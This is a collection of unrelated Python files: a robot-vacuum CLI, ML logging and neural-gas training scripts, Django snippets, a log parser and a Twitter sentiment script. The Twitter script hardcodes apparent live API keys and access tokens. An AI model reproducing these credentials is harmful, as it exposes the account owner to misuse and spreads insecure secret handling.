res.sensor_dirty_left))
@cli.command()
@click.argument('name', type=str, required=True)
@pass_dev
def reset_consumable(vac: miio.Vacuum, name):
"""Reset consumable state.
Allowed values: main_brush, side_brush, filter, sensor_dirty
"""
from miio.vacuum import Consumable
if name == 'main_brush':
consumable = Consumable.MainBrush
elif name == 'side_brush':
consumable = Consumable.SideBrush
elif name == 'filter':
consumable = Consumable.Filter
elif name == 'sensor_dirty':
consumable = Consumable.SensorDirty
else:
click.echo("Unexpected state name: %s" % name)
return
click.echo("Resetting consumable '%s': %s" % (
name,
vac.consumable_reset(consumable)
))
@cli.command()
@pass_dev
def start(vac: miio.Vacuum):
"""Start cleaning."""
click.echo("Starting cleaning: %s" % vac.start())
@cli.command()
@pass_dev
def spot(vac: miio.Vacuum):
"""Start spot cleaning."""
click.echo("Starting spot cleaning: %s" % vac.spot())
@cli.command()
@pass_dev
def pause(vac: miio.Vacuum):
"""Pause cleaning."""
click.echo("Pausing: %s" % vac.pause())
@cli.command()
@pass_dev
def stop(vac: miio.Vacuum):
"""Stop cleaning."""
click.echo("Stop cleaning: %s" % vac.stop())
@cli.command()
@pass_dev
def home(vac: miio.Vacuum):
"""Return home."""
click.echo("Requesting return to home: %s" % vac.home())
@cli.group()
@pass_dev
# @click.argument('command', required=False)
def manual(vac: miio.Vacuum):
"""Control the robot manually."""
command = ''
if command == 'start':
click.echo("Starting manual control")
return vac.manual_start()
if command == 'stop':
click.echo("Stopping manual control")
return vac.manual_stop()
# if not vac.manual_mode and command :
@manual.command() # noqa: F811 # redefinition of start
@pass_dev
def start(vac: miio.Vacuum):
"""Activate the manual mode."""
click.echo("Activating manual controls")
return vac.manual_start()
@manual.command() # noqa: F811 # redefinition of stop
@pass_dev
def stop(vac: miio.Vacuum):
"""Deactivate the manual mode."""
click.echo("Deactivating manual controls")
return vac.manual_stop()
@manual.command()
@pass_dev
@click.argument('degrees', type=int)
def left(vac: miio.Vacuum, degrees: int):
"""Turn to left."""
click.echo("Turning %s degrees left" % degrees)
return vac.manual_control(degrees, 0)
@manual.command()
@pass_dev
@click.argument('degrees', type=int)
def right(vac: miio.Vacuum, degrees: int):
"""Turn to right."""
click.echo("Turning right")
return vac.manual_control(-degrees, 0)
@manual.command()
@click.argument('amount', type=float)
@pass_dev
def forward(vac: miio.Vacuum, amount: float):
"""Run forwards."""
click.echo("Moving forwards")
return vac.manual_control(0, amount)
@manual.command()
@click.argument('amount', type=float)
@pass_dev
def backward(vac: miio.Vacuum, amount: float):
"""Run backwards."""
click.echo("Moving backwards")
return vac.manual_control(0, -amount)
@manual.command()
@pass_dev
@click.argument('rotation', type=float)
@click.argument('velocity', type=float)
@click.argument('duration', type=int)
def move(vac: miio.Vacuum, rotation: int, velocity: float, duration: int):
"""Pass raw manual values"""
return vac.manual_control(rotation, velocity, duration)
@cli.command()
@click.argument('cmd', required=False)
@click.argument('start_hr', type=int, required=False)
@click.argument('start_min', type=int, required=False)
@click.argument('end_hr', type=int, required=False)
@click.argument('end_min', type=int, required=False)
@pass_dev
def dnd(vac: miio.Vacuum, cmd: str,
start_hr: int, start_min: int,
end_hr: int, end_min: int):
"""Query and adjust do-not-disturb mode."""
if cmd == "off":
click.echo("Disabling DND..")
print(vac.disable_dnd())
elif cmd == "on":
click.echo("Enabling DND %s:%s to %s:%s" % (start_hr, start_min,
end_hr, end_min))
click.echo(vac.set_dnd(start_hr, start_min, end_hr, end_min))
else:
x = vac.dnd_status()
click.echo(click.style("Between %s and %s (enabled: %s)" % (
x.start, x.end, x.enabled), bold=x.enabled))
@cli.command()
@click.argument('speed', type=int, required=False)
@pass_dev
def fanspeed(vac: miio.Vacuum, speed):
"""Query and adjust the fan speed."""
if speed:
click.echo("Setting fan speed to %s" % speed)
vac.set_fan_speed(speed)
else:
click.echo("Current fan speed: %s" % vac.fan_speed())
@cli.group(invoke_without_command=True)
@pass_dev
@click.pass_context
def timer(ctx, vac: miio.Vacuum):
"""List and modify existing timers."""
if ctx.invoked_subcommand is not None:
return
timers = vac.timer()
click.echo("Timezone: %s\n" % vac.timezone())
for idx, timer in enumerate(timers):
color = "green" if timer.enabled else "yellow"
click.echo(click.style("Timer #%s, id %s (ts: %s)" % (
idx, timer.id, timer.ts), bold=True, fg=color))
click.echo(" %s" % timer.cron)
min, hr, x, y, days = timer.cron.split(' ')
cron = "%s %s %s %s %s" % (min, hr, x, y, days)
click.echo(" %s" % pretty_cron.prettify_cron(cron))
@timer.command()
@click.option('--cron')
@click.option('--command', default='', required=False)
@click.option('--params', default='', required=False)
@pass_dev
def add(vac: miio.Vacuum, cron, command, params):
"""Add a timer."""
click.echo(vac.add_timer(cron, command, params))
@timer.command()
@click.argument('timer_id', type=int, required=True)
@pass_dev
def delete(vac: miio.Vacuum, timer_id):
"""Delete a timer."""
click.echo(vac.delete_timer(timer_id))
@timer.command()
@click.argument('timer_id', type=int, required=True)
@click.option('--enable', is_flag=True)
@click.option('--disable', is_flag=True)
@pass_dev
def update(vac: miio.Vacuum, timer_id, enable, disable):
"""Enable/disable a timer."""
from miio.vacuum import TimerState
if enable and not disable:
vac.update_timer(timer_id, TimerState.On)
elif disable and not enable:
vac.update_timer(timer_id, TimerState.Off)
else:
click.echo("You need to specify either --enable or --disable")
@cli.command()
@pass_dev
def find(vac: miio.Vacuum):
"""Find the robot."""
click.echo("Sending find the robot calls.")
click.echo(vac.find())
@cli.command()
@pass_dev
def map(vac: miio.Vacuum):
"""Return the map token."""
click.echo(vac.map())
@cli.command()
@pass_dev
def info(vac: miio.Vacuum):
"""Return device information."""
try:
res = vac.info()
click.echo("%s" % res)
_LOGGER.debug("Full response: %s", pf(res.raw))
except TypeError:
click.echo("Unable to fetch info, this can happen when the vacuum "
"is not connected to the Xiaomi cloud.")
@cli.command()
@pass_dev
def cleaning_history(vac: miio.Vacuum):
"""Query the cleaning history."""
res = vac.clean_history()
click.echo("Total clean count: %s" % res.count)
click.echo("Cleaned for: %s (area: %s m²)" % (res.total_duration,
res.total_area))
click.echo()
for idx, id_ in enumerate(res.ids):
for e in vac.clean_details(id_):
color = "green" if e.complete else "yellow"
click.echo(click.style(
"Clean #%s: %s-%s (complete: %s, error: %s)" % (
idx, e.start, e.end, e.complete, e.error),
bold=True, fg=color))
click.echo(" Area cleaned: %s m²" % e.area)
click.echo(" Duration: (%s)" % e.duration)
click.echo()
@cli.command()
@click.argument('volume', type=int, required=False)
@click.option('--test', 'test_mode', is_flag=True, help="play a test tune")
@pass_dev
def sound(vac: miio.Vacuum, volume: int, test_mode: bool):
"""Query and change sound settings."""
if volume is not None:
click.echo("Setting sound volume to %s" % volume)
vac.set_sound_volume(volume)
if test_mode:
vac.test_sound_volume()
click.echo("Current sound: %s" % vac.sound_info())
click.echo("Current volume: %s" % vac.sound_volume())
click.echo("Install progress: %s" % vac.sound_install_progress())
@cli.command()
@click.argument('url')
@click.argument('md5sum', required=False, default=None)
@click.option('--sid', type=int, required=False, default=10000)
@click.option('--ip', required=False)
@pass_dev
def install_sound(vac: miio.Vacuum, url: str, md5sum: str, sid: int, ip: str):
"""Install a sound.
When passing a local file this will create a self-hosting server
for the given file and the md5sum will be calculated automatically.
For URLs you have to specify the md5sum manually.
`--ip` can be used to override automatically detected IP address for
the device to contact for the update.
"""
click.echo("Installing from %s (md5: %s) for id %s" % (url, md5sum, sid))
local_url = None
server = None
if url.startswith("http"):
if md5sum is None:
click.echo("You need to pass md5 when using URL for updating.")
return
local_url = url
else:
server = OneShotServer(url)
local_url = server.url(ip)
md5sum = server.md5
t = threading.Thread(target=server.serve_once)
t.start()
click.echo("Hosting file at %s" % local_url)
click.echo(vac.install_sound(local_url, md5sum, sid))
progress = vac.sound_install_progress()
while progress.is_installing:
progress = vac.sound_install_progress()
print("%s (%s %%)" % (progress.state.name, progress.progress))
time.sleep(1)
progress = vac.sound_install_progress()
if progress.is_errored:
click.echo("Error during installation: %s" % progress.error)
else:
click.echo("Installation of sid '%s' complete!" % sid)
if server is not None:
t.join()
@cli.command()
@pass_dev
def serial_number(vac: miio.Vacuum):
"""Query serial number."""
click.echo("Serial#: %s" % vac.serial_number())
@cli.command()
@click.argument('tz', required=False)
@pass_dev
def timezone(vac: miio.Vacuum, tz=None):
"""Query or set the timezone."""
if tz is not None:
click.echo("Setting timezone to: %s" % tz)
click.echo(vac.set_timezone(tz))
else:
click.echo("Timezone: %s" % vac.timezone())
@cli.command()
@click.argument('enabled', required=False, type=bool)
@pass_dev
def carpet_mode(vac: miio.Vacuum, enabled=None):
"""Query or set the carpet mode."""
if enabled is None:
click.echo(vac.carpet_mode())
else:
click.echo(vac.set_carpet_mode(enabled))
@cli.command()
@click.argument('ssid', required=True)
@click.argument('password', required=True)
@click.argument('uid', type=int, required=False)
@click.option('--timezone', type=str, required=False, default=None)
@pass_dev
def configure_wifi(vac: miio.Vacuum, ssid: str, password: str,
uid: int, timezone: str):
"""Configure the wifi settings.
Note that some newer firmwares may expect you to define the timezone
by using --timezone."""
click.echo("Configuring wifi to SSID: %s" % ssid)
click.echo(vac.configure_wifi(ssid, password, uid, timezone))
@cli.command()
@pass_dev
def update_status(vac: miio.Vacuum):
"""Return update state and progress."""
update_state = vac.update_state()
click.echo("Update state: %s" % update_state)
if update_state == UpdateState.Downloading:
click.echo("Update progress: %s" % vac.update_progress())
@cli.command()
@click.argument('url', required=True)
@click.argument('md5', required=False, default=None)
@click.option('--ip', required=False)
@pass_dev
def update_firmware(vac: miio.Vacuum, url: str, md5: str, ip: str):
"""Update device firmware.
If `url` starts with http* it is expected to be an URL.
In that case md5sum of the file has to be given.
`--ip` can be used to override automatically detected IP address for
the device to contact for the update.
"""
# TODO Check that the device is in updateable state.
click.echo("Going to update from %s" % url)
if url.lower().startswith("http"):
if md5 is None:
click.echo("You need to pass md5 when using URL for updating.")
return
click.echo("Using %s (md5: %s)" % (url, md5))
else:
server = OneShotServer(url)
url = server.url(ip)
t = threading.Thread(target=server.serve_once)
t.start()
click.echo("Hosting file at %s" % url)
md5 = server.md5
update_res = vac.update(url, md5)
if update_res:
click.echo("Update started!")
else:
click.echo("Starting the update failed: %s" % update_res)
with tqdm(total=100) as t:
state = vac.update_state()
while state == UpdateState.Downloading:
try:
state = vac.update_state()
progress = vac.update_progress()
except: # we may not get our messages through during upload
continue
if state == UpdateState.Installing:
click.echo("Installation started, please wait until the vacuum reboots")
break
t.update(progress - t.n)
t.set_description("%s" % state.name)
time.sleep(1)
@cli.command()
@click.argument('cmd', required=True)
@click.argument('parameters', required=False)
@pass_dev
def raw_command(vac: miio.Vacuum, cmd, parameters):
"""Run a raw command."""
params = [] # type: Any
if parameters:
params = ast.literal_eval(parameters)
click.echo("Sending cmd %s with params %s" % (cmd, params))
click.echo(vac.raw_command(cmd, params))
if __name__ == "__main__":
cli()
|
import os
import time
import numpy as np
import pandas as pd
from util import util
from datasets import save_file
from torch.utils.tensorboard import SummaryWriter
class Visualizer:
"""
This class print/save logging information
"""
def __init__(self, param):
"""
Initialize the Visualizer class
"""
self.param = param
tb_dir = os.path.join(param.checkpoints_dir, param.experiment_name, 'tb_log')
util.mkdir(tb_dir)
if param.isTrain:
# Create a logging file to store training losses
self.train_log_filename = os.path.join(param.checkpoints_dir, param.experiment_name, 'train_log.txt')
with open(self.train_log_filename, 'a') as log_file:
now = time.strftime('%c')
log_file.write('----------------------- Training Log ({:s}) -----------------------\n'.format(now))
self.train_summary_filename = os.path.join(param.checkpoints_dir, param.experiment_name, 'train_summary.txt')
with open(self.train_summary_filename, 'a') as log_file:
now = time.strftime('%c')
log_file.write('----------------------- Training Summary ({:s}) -----------------------\n'.format(now))
# Create log folder for TensorBoard
tb_train_dir = os.path.join(param.checkpoints_dir, param.experiment_name, 'tb_log', 'train')
util.mkdir(tb_train_dir)
util.clear_dir(tb_train_dir)
# Create TensorBoard writer
self.train_writer = SummaryWriter(log_dir=tb_train_dir)
if param.isTest:
# Create a logging file to store testing metrics
self.test_log_filename = os.path.join(param.checkpoints_dir, param.experiment_name, 'test_log.txt')
with open(self.test_log_filename, 'a') as log_file:
now = time.strftime('%c')
log_file.write('----------------------- Testing Log ({:s}) -----------------------\n'.format(now))
self.test_summary_filename = os.path.join(param.checkpoints_dir, param.experiment_name, 'test_summary.txt')
with open(self.test_summary_filename, 'a') as log_file:
now = time.strftime('%c')
log_file.write('----------------------- Testing Summary ({:s}) -----------------------\n'.format(now))
# Create log folder for TensorBoard
tb_test_dir = os.path.join(param.checkpoints_dir, param.experiment_name, 'tb_log', 'test')
util.mkdir(tb_test_dir)
util.clear_dir(tb_test_dir)
# Create TensorBoard writer
self.test_writer = SummaryWriter(log_dir=tb_test_dir)
def print_train_log(self, epoch, iteration, losses, metrics, load_time, comp_time, batch_size, dataset_size):
"""
print train log on console and save the message to the disk
Parameters:
epoch (int) -- current epoch
iteration (int) -- current training iteration during this epoch
losses (OrderedDict) -- training losses stored in the ordered dict
metrics (OrderedDict) -- metrics stored in the ordered dict
load_time (float) -- data loading time per data point (normalized by batch_size)
comp_time (float) -- computational time per data point (normalized by batch_size)
batch_size (int) -- batch size of training
dataset_size (int) -- size of the training dataset
"""
data_point_covered = min((iteration + 1) * batch_size, dataset_size)
message = '[TRAIN] [Epoch: {:3d} Iter: {:4d} Load_t: {:.3f} Comp_t: {:.3f}] '.format(epoch, data_point_covered, load_time, comp_time)
for name, loss in losses.items():
message += '{:s}: {:.4f} '.format(name, loss[-1])
for name, metric in metrics.items():
message += '{:s}: {:.4f} '.format(name, metric[-1])
print(message) # print the message
with open(self.train_log_filename, 'a') as log_file:
log_file.write(message + '\n') # save the message
def print_train_summary(self, epoch, losses, metrics, train_time):
"""
print the summary of this training epoch
Parameters:
epoch (int) -- epoch number of this training model
losses (OrderedDict) -- the losses dictionary
metrics (OrderedDict) -- the metrics dictionary
train_time (float) -- time used for training this epoch
"""
write_message = '{:s}\t'.format(str(epoch))
print_message = '[TRAIN] [Epoch: {:4d}] '.format(int(epoch))
for name, loss in losses.items():
write_message += '{:.6f}\t'.format(np.mean(loss))
print_message += name + ': {:.6f} '.format(np.mean(loss))
self.train_writer.add_scalar(name, np.mean(loss), epoch)
for name, metric in metrics.items():
write_message += '{:.6f}\t'.format(np.mean(metric))
print_message += name + ': {:.6f} '.format(np.mean(metric))
self.train_writer.add_scalar(name, np.mean(metric), epoch)
with open(self.train_summary_filename, 'a') as log_file:
log_file.write(write_message + '\n')
train_time_msg = 'Training time used: {:.3f}s'.format(train_time)
print_message += '\n' + train_time_msg
print(print_message)
with open(self.train_log_filename, 'a') as log_file:
log_file.write(train_time_msg + '\n')
def print_test_log(self, epoch, iteration, metrics, batch_size, dataset_size):
"""
print performance metrics of this iteration on console and save the message to the disk
Parameters:
epoch (int) -- epoch number of this testing model
iteration (int) -- current testing iteration during this epoch
metrics (OrderedDict) -- testing metrics stored in the dictionary
batch_size (int) -- batch size of testing
dataset_size (int) -- size of the testing dataset
"""
data_point_covered = min((iteration + 1) * batch_size, dataset_size)
message = '[TEST] [Epoch: {:3d} Iter: {:4d}] '.format(int(epoch), data_point_covered)
for name, metric in metrics.items():
message += '{:s}: {:.4f} '.format(name, metric[-1])
print(message)
with open(self.test_log_filename, 'a') as log_file:
log_file.write(message + '\n')
def print_test_summary(self, epoch, metrics, test_time):
"""
print the summary of this testing epoch
Parameters:
epoch (int) -- epoch number of this testing model
metrics (OrderedDict) -- the metrics dictionary
test_time (float) -- time used for testing this epoch
"""
write_message = '{:s}\t'.format(str(epoch))
print_message = '[TEST] [Epoch: {:4d}] '.format(int(epoch))
for name, metric in metrics.items():
write_message += '{:.6f}\t'.format(np.mean(metric))
print_message += name + ': {:.6f} '.format(np.mean(metric))
self.test_writer.add_scalar(name, np.mean(metric), epoch)
with open(self.test_summary_filename, 'a') as log_file:
log_file.write(write_message + '\n')
test_time_msg = 'Testing time used: {:.3f}s'.format(test_time)
print_message += '\n' + test_time_msg
print(print_message)
with open(self.test_log_filename, 'a') as log_file:
log_file.write(test_time_msg + '\n')
def save_fake_omics(self, fake_dict, sample_list, feature_list):
"""
save the fake omics data to disc
Parameters:
fake_dict (OrderedDict)) -- the fake omics data and the corresponding index
sample_list (ndarray) -- the sample list for the input data
feature_list (ndarray) -- the feature list of the generated omics data
"""
output_sample_list = sample_list[fake_dict['index'].astype(int)]
fake_df = pd.DataFrame(data=fake_dict['fake'].T, index=feature_list, columns=output_sample_list)
print('Saving generated omics file...')
save_file(self.param, fake_df, 'fake_A')
|
# coding=utf-8
# 我的想法是
# 我随机选一个人,然后看这个人是否know anyone in potential group
# 如果他知道其中任何一个人,那么他就不可能是要找的那个人,
#
# The knows API is already defined for you.
# @param a, person a
# @param b, person b
# @return a boolean, whether a knows b
# def knows(a, b):
from random import randint
class Solution(object):
def findCelebrity(self, n):
"""
:type n: int
:rtype: int
"""
x = randint(0, n - 1)
for i in xrange(n):
if knows(x, i):
x = i
if any(knows(x, i) for i in xrange(x)):
return -1
if any(not knows(i, x) for i in xrange(n)):
return -1
return x |
import csv
import re
import sys
import tweepy
from textblob import TextBlob
# Step 1 - Autenticacion con el api de twiter
consumer_key = 'OoKtdnkn2PhPdVopgcPPVszBL'
consumer_secret = 'zJCI08nnQ7wGiosCOe7Udbu4PlpchanXFbjytZZJFkontr2wOC'
access_token = '572213920-pfExxBDxG4W7gu6ke8Yh1xexYcypE9QOddfvpY6u'
access_token_secret = 'C2tOsrGpF48uBoxVjcyHYptljLpfAesln2ABZacpLy1mL'
# Step 2 - pasamos parametros
auth = tweepy.OAuthHandler(consumer_key, consumer_secret)
auth.set_access_token(access_token, access_token_secret)
api = tweepy.API(auth)
# Step 3 - los re-twiter buscando
public_tweets = api.search(sys.argv[1])
# Step 4 - Separamos los twiter
def clean_tweet(tweet):
tweet = ' '.join(re.sub("(@[A-Za-z0-9]+)|([^0-9A-Za-z \t])|(\w+:\/\/\S+)", " ", tweet).split())
return tweet
# Step 5 - Segundo parametros
f = open(sys.argv[2], 'wt')
try:
# Step 5.0 - guardamos
writer = csv.writer(f)
writer.writerow(('Tweet', 'Sentiment'))
# Step 5.1 - recorremos los tweets
for tweet in public_tweets:
cleaned_tweet = clean_tweet(tweet.text)
_analysis = TextBlob(cleaned_tweet)
# Step 5.2 - si verifica polaridad
if (_analysis.sentiment.polarity > 0):
sentiment = 'POSITIVE'
elif (_analysis.sentiment.polarity == 0):
sentiment = 'NEUTRAL'
else:
sentiment = 'NEGATIVE'
writer.writerow((cleaned_tweet, sentiment))
finally:
f.close()
# Step 5 - fin del documento
print(open(sys.argv[2], 'rt').read())
# EXAMPLE python demo.py "palabra_a_buscar" "nombre_archivo.csv"
|
from rest_framework import serializers
from .models import Car, Cart, UserCars
class CarSerializer(serializers.ModelSerializer):
class Meta:
model = Car
fields = "__all__"
class CartSerializer(serializers.ModelSerializer):
class Meta:
model = Cart
fields = "__all__"
class UserCarsSerializer(serializers.ModelSerializer):
class Meta:
model = UserCars
fields = "__all__"
|
from django_filters import rest_framework as filters
from apps.django.main.course.public import model_names as course_names
from apps.django.main.timetable.mixins import LessonFilterSetMixin
from ...models import Material
__all__ = [
"MaterialFilterSet"
]
class MaterialFilterSet(LessonFilterSetMixin):
class Meta:
model = Material
fields = {
"announce": ["exact"],
"publish_datetime": ["lte", "gte"],
}
course = filters.CharFilter(
field_name="lesson__course__id",
label=course_names.COURSE
)
|
from django.urls import path
from . import views
urlpatterns = [
path('words/', views.WordSet.as_view()),
path('las/', views.LaSet.as_view()),
path('cards/', views.CardSet.as_view()),
path('intros/', views.IntroSet.as_view()),
path('grammar-cards/', views.GrammarCardSet.as_view()),
path('grammar-cards/(<pk>[0-9]+)/', views.GrammarCardDetail.as_view()),
path('alphabets/', views.AlphabetSet.as_view()),
]
|
import datetime
now = datetime.datetime.now()
year = now.year
month = now.month
day = now.day
hour = now.hour
minute = now.minute
second = now.second
print("{}년 {}월 {}일 {}시 {}분 {}초".format(year, month, day, hour, minute, second))
if hour < 12:
print("현재 시각은 {}:{} \'오전\' 입니다.".format(hour, minute))
if hour >= 12:
print("현재 시각은 {}:{} \'오후\' 입니다.".format(hour, minute))
|
# -*- encoding: utf-8 -*-
import re
from pyparsing import *
from datetime import datetime
import time
def Ignore_files(url):
if '.' in url[url.rfind('/'):]:
#print(url)
return False
return True
def Ignore_www(url):
i = url.find('www.')
if i == -1:
return url
url = url.replace("www.", "", 1)
return url
def Ignore_urls(ignored_urls,url):
if url in ignored_urls:
return False
return True
def Start_at(data, start_at):
start_at = start_at[0:start_at.index(" ")]
if datetime.strptime(data,"%d/%b/%Y") < datetime.strptime(start_at,"%d/%b/%Y"):
return False
return True
def Finish_at(data, stop_at):
stop_at = stop_at[0:stop_at.index(" ")]
if datetime.strptime(data,"%d/%b/%Y") > datetime.strptime(stop_at,"%d/%b/%Y"):
return False
return True
def Request_type(type, request_type):
if type == request_type:
return True
return False
def parse(
ignore_files=False,
ignore_urls=[],
start_at=None,
stop_at=None,
request_type=None,
ignore_www=False,
slow_queries=False
):
f = open('log.log', 'r')
request_date = Word(alphas+'/'+nums)
request_time = Word(alphas+':'+nums)
request_type1 = Word(alphas)
request = Word(printables)
protocol = Word(alphas+nums+'/'+'.')
responce_code = Word(nums)
responce_time = Word(nums)
dict = {}
#reg = Regex(r'\[(?P<request_date>[0-9]:/ \]+) "(?P<method>[A-Z]+) (?P<request>[a-zA-Z0-9.:/]+) (?P<protocol>[A-Z0-9/]+)" [0-9]+ [0-9]+')
for line in f:
#print(line)
parse_module = '[' + request_date + request_time+'] "' + request_type1 + request + protocol +'" ' + responce_code + responce_time
try:
result = parse_module.parseString(line)
except:
continue
url = result[5]
url = url[url.find("//")+2 : ]
if "?" in url:
#print(url)
url = url[0:url.find("?")]
#print(url)
if "#" in url:
#print(url)
url = url[0:url.find("#")]
#print(url)
time = result[1]
type = result[4]
#url = result[5][0:result[5][0].rfind("?")]
proto = result[6]
worktime=result[9]
code = result[8]
if start_at !=None :
if Start_at(time,start_at) == False:
continue
if stop_at !=None :
if Finish_at(time,stop_at) == False:
break
if ignore_files == True:
if Ignore_files(url) == False:
#print(url)
continue
if ignore_urls != [] :
if Ignore_urls(ignore_urls,url) == False:
continue
if request_type != None :
if Request_type(type,request_type) == False:
continue
if ignore_www == True :
url = Ignore_www(url)
#print(url)
if url in dict:
dict[url][0] += 1
dict[url][1] += int(worktime)
else:
dict[url]=[1,int(worktime)]
#print(dict)
#res = reg.parseString(line)
#rint(res)
if slow_queries == True:
s = []
for i in dict:
s.append(int(dict[i][1] / dict[i][0]))
s.sort(reverse=True)
return s[0:5]
else:
s=[]
for i in dict:
s.append(dict[i][0])
s.sort(reverse=True)
return s[0:5]
#print(parse(start_at="18/Mar/2018 11:19:41", stop_at="25/Mar/2018 11:17:31"))
# print(Ignore_www("https://www.abc.ru /"))
# Start_at("18/Mar/2018 11:19:40","18/Mar/2018 11:19:20") |
import numpy as np
import sys
from neural_gas_marconi import NeuralGasNode
from numpy import *
from PIL import Image
import datetime
from random import shuffle
import os
import errno
#import sys
start_time= datetime.datetime.now()
'''
Training input file can be selected by properly specifying n_cats andn_reps
'''
#number of categories --> possible values: 2,4,8
n_cats=2
#number of examples for each category --> possible values: 20(only for n_cats=2),30
n_reps=30
#number of training examples of each class actually used in the training phase
#(randomly extracted from the n_reps input file examples)
n_examples=5
#enable/disable normailzation over the training/testing set
normalize=False
infile = 'chartrj_'+str(n_cats)+'cat'+str(n_reps)+'rep_train.txt'
testfile = 'chartrj_'+str(n_cats)+'cat'+str(n_reps)+'rep_test.txt'
'''
Neural Gas parameters initialization
'''
#n_xnodes*n_ynodes -> total number of neurons
n_xnodes=10
n_ynodes=10
k=3
n_of_features=3
#n_features_vectors=len(features_vector)
n_epochs=5
init_lambda=0.05*n_xnodes*n_ynodes
final_lambda=0.01
init_epsilon=0.3
final_epsilon=0.001
beta=0.5
# the alfa parameters weights express the importance of the current
# input signal over the past
alfa0=0.5
alfak=0.5/k #equal to 0.5/K
print 'Starting...', start_time
def make_sure_path_exists(path):
""""Check if the provided path exists. If it does not exist, create it."""
try:
os.makedirs(path)
except OSError as exception:
if exception.errno != errno.EEXIST:
raise
# piece of code from create_ds_all.py
def slices_from_resets_with_cat(cat,reset):
"""
Receives an array composed of 0s and 1s and returns the slices contained
between 1s
"""
resets = np.argwhere(reset).ravel()
# Computes the slices for each repetition
repetition_slices = {}
begin = 0
for r in resets:
if r == begin:
continue
c = cat[begin]
if not repetition_slices.has_key(c):
repetition_slices[c] = []
repetition_slices[c].append(slice(begin, r))
begin = r
c = cat[begin]
if not repetition_slices.has_key(c):
repetition_slices[c] = []
repetition_slices[c].append(slice(begin, len(reset)))
return repetition_slices
def normalize_vector(input_vector):
normalized_vector=zeros((len(input_vector),input_vector.shape[1]))
for i in range(len(input_vector)):
v=input_vector[i]
sq_v=v*v
norm=sum(sq_v)
# print v
if norm == 0: # some are all zeros
normalized_vector[i]=v
else:
#print sq
v=v/sqrt(norm)
normalized_vector[i]=v
return normalized_vector
print 'Loading data from ', infile, '....'
data = np.loadtxt(infile,skiprows=1)
#total number of rows in the input file
total_points = data.shape[0]
print 'loaded: ', data.shape
print 'input_dim', data.shape[1]
print "Categories: ", np.unique(data[:,0])
'''
print 'categories_vector', data[:,0]
print 'only 2,3,4 columns:'
print data[:,(2,3,4)]
'''
print "total points",total_points
print '******************'
#slices to be used in order to have indexes of the examples in the dataset (not currently used)
total_slices = slices_from_resets_with_cat(data[:,0],data[:,1])
slices=[]
#extract n_examples from slices
for cat in total_slices:
shuffle(total_slices[cat])
slices.append(total_slices[cat][0:n_examples])
#print slices
#features vectors list (categories and reset columns are omitted)
features_vector = data[:,(2,3,4)]
#categories vacctor (needed for supervised learning)
categories_vector = data[:,0]
#parameter to be passed to the network for classification
categories = np.unique(data[:,0])
print 'input classes'
for c in total_slices.keys():
print c
if normalize:
norm_features_vector = normalize_vector(features_vector)
else:
norm_features_vector = features_vector
#print norm_features_vector
#categories_vector reshaped in order to be re-assembled to features_vectors
categories_vector = categories_vector.reshape(norm_features_vector.shape[0],1)
#categories_vector re-assembled with the features_vectors
normalized_data_vector = np.append(categories_vector, norm_features_vector, axis=1)
#based on the previously found slices, the input_vector is built as a list of examples(i.e. sequences of samples (cat,x,y,z))
input_vector=[]
for s in slices:
for i in s:
input_vector.append(normalized_data_vector[i])
'''
Neural Gas instantiation and training
'''
ng=NeuralGasNode(
n_xnodes,
n_ynodes,
k,
init_epsilon,
final_epsilon,
# epsilon,
init_lambda,
final_lambda,
# current_lambda,
beta,
n_epochs,
n_of_features,
# n_features_vectors,
categories,
alfa0,
alfak,
weight_matrix=None)
print 'start training - ', n_xnodes * n_ynodes,'nodes'
#print 'category_matrix'+str(n_cats)+'cat_'+str(n_examples)+'_rep_beta'+str(beta)+\
# '__'+str(n_epochs)+'epochs__'+str(n_xnodes*n_ynodes)+'_neurons.png'
print 'beta', beta
print 'K', k
start_training=datetime.datetime.now()
ng.train(input_vector)
'''
w_m = ng.weight_matrix
print 'Weight Matrix:'
for i in range(len(w_m)):
for j in range(len(w_m)):
print w_m[i][j]
'''
end_training=datetime.datetime.now()
training_time = end_training-start_training
print 'end training - ', n_xnodes * n_ynodes,'nodes', ' - Training Time: ',training_time
'''
#draw ng.bmu_matrix to glance at the occurrences of each neuron as BMU in a graphic way
w,h = ng.n_xnodes,n_ynodes
data = np.zeros( (w,h,3), dtype=np.uint8)
for x in range(w):
# print a.bmu_matrix[x]
for y in range(h):
data[x,y] = [0,ng.bmu_matrix[x][y],0]
img = Image.fromarray(data, 'RGB')
img.save('bmu_matrix.png')
'''
#TESTING SECTION
#Testing is performed over the corresponding testing dataset
#All the examples of the testing dataset are submitted to the neural gas
#Each record in the dataset is labeled depending on the label of the BMU
print '---------TESTING------------'
print 'Loading data from ', testfile, '....'
test_data = np.loadtxt(testfile,skiprows=1)
test_slices = slices_from_resets_with_cat(test_data[:,0],test_data[:,1])
test_features_vector = test_data[:,(2,3,4)]
test_categories_vector = test_data[:,0]
if normalize:
test_features_vector = normalize_vector(test_features_vector)
else:
test_features_vector = test_features_vector
#print test_features_vector
test_categories_vector = test_categories_vector.reshape(test_features_vector.shape[0],1)
test_data_vector = np.append(test_categories_vector, test_features_vector, axis=1)
test_input_vector=[]
for s in test_slices.values():
for i in s:
test_input_vector.append(test_data_vector[i])
print 'start TESTING - ', n_xnodes * n_ynodes,'nodes'
start_testing=datetime.datetime.now()
ng.test(test_input_vector)
end_testing=datetime.datetime.now()
testing_time = end_testing-start_testing
print 'end testing - ', n_xnodes * n_ynodes,'nodes', ' -> Testing Time: ',testing_time
print 'Success rate:' , ng.success_rate, '%'
print 'Success rate on examples:' , ng.example_success_rate, '%'
print 'Success rate by category:'
for cat in ng.success_rate_by_category:
print cat, '->', ng.success_rate_by_category[cat]
#draw ng.neurons_labels_matrix to glance at the labels assigned to each neuron
w,h = ng.n_xnodes,n_ynodes
data = np.zeros( (w,h,3), dtype=np.uint8)
for x in range(w):
# print a.bmu_matrix[x]
for y in range(h):
data[x,y] = [0,30*ng.neurons_labels_matrix[x][y],0]
img = Image.fromarray(data, 'RGB')
out_folder = 'tests_'+str(n_cats)+'cat_'+str(n_reps)+'_rep'
out_filename = 'category_matrix_'+str(n_cats)+'cat_'+str(n_examples)+\
'_rep_beta_'+str(beta)+'__'+str(n_xnodes*n_ynodes)+'_neurons__'+\
str(n_epochs)+'epochs__'+str(ng.success_rate)+'p__'+\
str(ng.example_success_rate)+'ex__lambda_s_'+str(init_lambda)+\
'_e_'+str(final_lambda)+'__k_'+str(ng.k)+'__norm_'+str(normalize)+'.png'
print '*********************'
print 'saving '+out_folder+'/'+out_filename+' ...'
make_sure_path_exists(out_folder)
img.save(out_folder+'/'+out_filename)
|
import os
